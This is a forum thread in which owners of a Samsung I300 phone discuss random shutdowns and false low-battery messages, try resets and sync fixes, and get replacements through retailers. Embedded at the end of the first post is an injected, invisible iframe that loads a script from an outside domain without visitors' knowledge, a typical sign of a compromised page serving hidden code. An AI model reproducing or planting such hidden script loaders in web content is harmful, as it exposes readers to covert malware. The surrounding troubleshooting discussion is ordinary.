I've had my I300 for a couple of months. About 3 days ago, the phone started shutting itself off after about 10 to 30 minutes of inactivity. Always happens when display is off, never while using the phone. Palm side still is working fine. Not fixed by reset or (heaven forbid) hard reset with loss of data. Also not fixed by charging for 24 hours with phone off (I did this because every now and then while trying to turn the phone back on, I get the message "Phone is in low battery" even though battery is fully charged. . .thought the internal battery might be low).
I had a long talk with several tech support people at Samsung and they said they'd never heard of this and could come up with nothing to do to fix it. They said if I simply fax them my sales receipt, then called for an RA number, they'd let me mail my phone in for a fix -- they were pretty sure they could get it back to me within a month!
Anyone with other suggestions or similar experiences? The phone's only shut off a couple of times today. Perhaps it is healing itself!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
>>do you see the "screensaver" with the car and the city scape in the back?<<
Yes, when I hit the phone botton (bottom on right side) I see the phone pad for an instant, then the "screensaver". If I click on the car it asks if I want to turn the phone back on. On occasion, since this started, when I hit the phone button, the phone wakes up with the phone pad showing and the antenna looking like there is a good signal, but when I key in a phone number, there are no tones and when I hit talk, I get the message "Can't dial when phone is turned off" or something to that effect.
>>did yu install anything just prior to this happening?<<
This seemed to start after one of my relatively frequent (every couple of weeks) FATAL ERRORS requiring a reset, but nothing had been recently installed.
>>did you sync the phone with an old palm?<<
When I first got the phone, I did sync using the set up of my old palm and this is the setup I have used ever since. But it has been over two months of using the phone with setup and this problem just started.
>>the low batt note is for the external battery, not internal...<<
The tech support people at Samsung seemed to feel that the specific message I was getting "Phone is in low battery" related to the internal battery. I don't think I mentioned this but I have this same problem (phone turning off) even if it is sitting in its sync/charging cradle.
Do these answers help pin this down? I do think, based on the notes I've seen here, that I should try hard reseting the phone and then loading up the programs individually instead of doing a full restore, since the original loading was based on my old palm. It sounds like you'd agree with this.

yes do the cold reset. i hope you are using desktop 4.0.1.
if you are using desktop 4.0.1, then you will need to rename your folder to something else.. because the desktop has a backup folder in it and you will simply just reload everything back on.. so move that to another location on your drive and then do yous sync. sicne you DID use some of your old palm and the fact that nothing ever happend until 2 months later means nothing... errors and bugs wil creep up whenever..
so id just do that cold reset and dont install anything to the phone for a day or two.. then use the phone and the FACTORY installed apps as usual and see if the phone will behave correctly.. it should...
curious... on your old palm, did you have a setting that would turn the palm off after a certain amount of time? if so, thats why the phone is switching off...
Yes I do have Desktop 4.0.1. I also use Backup Buddy, which I will turn off.
Although I believe this will be a good thing to do for my fatal errors, etc., it is very unlikely this will solve my phone problem, since I still have this problem immediately after doing the hard reset, before the first sync.
Right now, I can't even get the phone to turn on at all, I keep getting the "Phone is in low battery" message, even while sitting in the cradle with a green charge light. Oh well. . .
I had exactly the same problem... the battery indicator would show fully charged but the phone in low battery message would appear & the phone would randomly shut off. After trying everything, I returned the phone to best buy & got another one.
Sounds like it could be an odd malfunction of the internal battery. You have owned the phone for some time now. I'd take it back as well. Sometimes that is the best solution.
In a true demonstration of the strangeness of human emotions, your note makes me feel much better. It hasn't helped my phone work any better but, just knowing that someone else had the very same problem makes me feel almost euphoric.
By the way, the good news here, in spite of Samsung's prediction of a month's turn-around for a repair, is that this is the one and only time I bought a service contract on an electronic device. The Best Buy service contract seemed remarkably cheap (I think it was under $30), included some kind of buy-back in 2 years, and has already paid for itself, since the cradle broke about 2 weeks into using it and they swapped it out on the spot. I expect this will more than pay for itself when I return home this weekend and head in Best Buy to get a new phone.
the phone may be a lemon, but the first thing is to troubleshoot before you take it back..which is what we were doing... if all fails, return it by al means...
by the by, you dont need backupbuddy.. desktop 4.0.1 does the exact same thing....
Agree entirely about trying to trouble shoot first. . . I'm quite attached to this phone and would prefer to fix rather than trade. Speaking of which, are there firmware revisions I should look for in the new phone to be sure I get the latest?
Regarding the two year buy back, I'll look at the agreement when I get home. Could have been an over-enthusiastic salesperson promising the world, but my recollection was that if, at the end of two years (perhaps it was within two years), the model has been replaced by a new one of higher price, you can apply the purchase price toward the new model. I330 here I come! Oops, don't want to insult my current phone or it might turn on me again.
Thanks for all the suggestions. Keep them coming. I'm still trying to get the phone to turn on. The advantage of this worsened state is that I won't have trouble convincing Best Buy to take it back.
Are you saying that the Palm Desktop does a full backup at each sync? I guess i need to RTFM I used backup buddy for a long time and it has even saved my tookus a few times too.
yep no need for bb.. however, the i300 does not save the db for the voice and speed dial #'s.. they get hosed in the event of a cold reset. on the kyo 6035 those db's were saved... perhaps the 1330 will save them...
Well, I returned to home from my business trip today and went to Best Buy with my receipt and sevice plan in hand. They gave me a new phone in about 10 minutes with minimal hassle (in fact, the only hassle was that the service person was still learning to use the cash register.)
I'm charging it up now but already have the phone number and voicemail switched over. I received a couple of private email messages from individuals who had had similar shut off problems.
I am going to be more careful about loading this phone up with fresh programs -- not the Vx sync I did on the original.
Just want to put my 5 cents in. I had the same problem months and months ago, even sent the phone into samsung. They sent it back in 3 days without any explanation. Same problem. Sprint gave me a credit and exchanged the phone. The tech at sprint said the phone was possessed
I have a friend that had the same problem, also mailed it to samsung, same results. Do you think samsung even looks at it or justs cleans the phone and sends it back?
The only problem with the new one I've had is I had to use the digitizer like 4 times in a row to get the screen to work right.
I wonder why the phone needs to be off to digitize the screen?
I love the phone but I think I'm ready for the next, better integrated version without the need to add so many features we all would have liked already there.
OK, maybe 8 cents worth or maybe 2 cents after all.

I think that's to prevent a call from coming in before you've finished the digitize process - remember that an incoming call always interrupts your palm activity...
I got the same thing. Mine started doing it one day after I bought it. I took it back to Circuit City and got another. It's working fine so far (three days).
Sprint PCS had no clue (as usual). I didn't even bother with Samsung support considering their dismal online tech support info. I think the FAQ has maybe two questions in it.
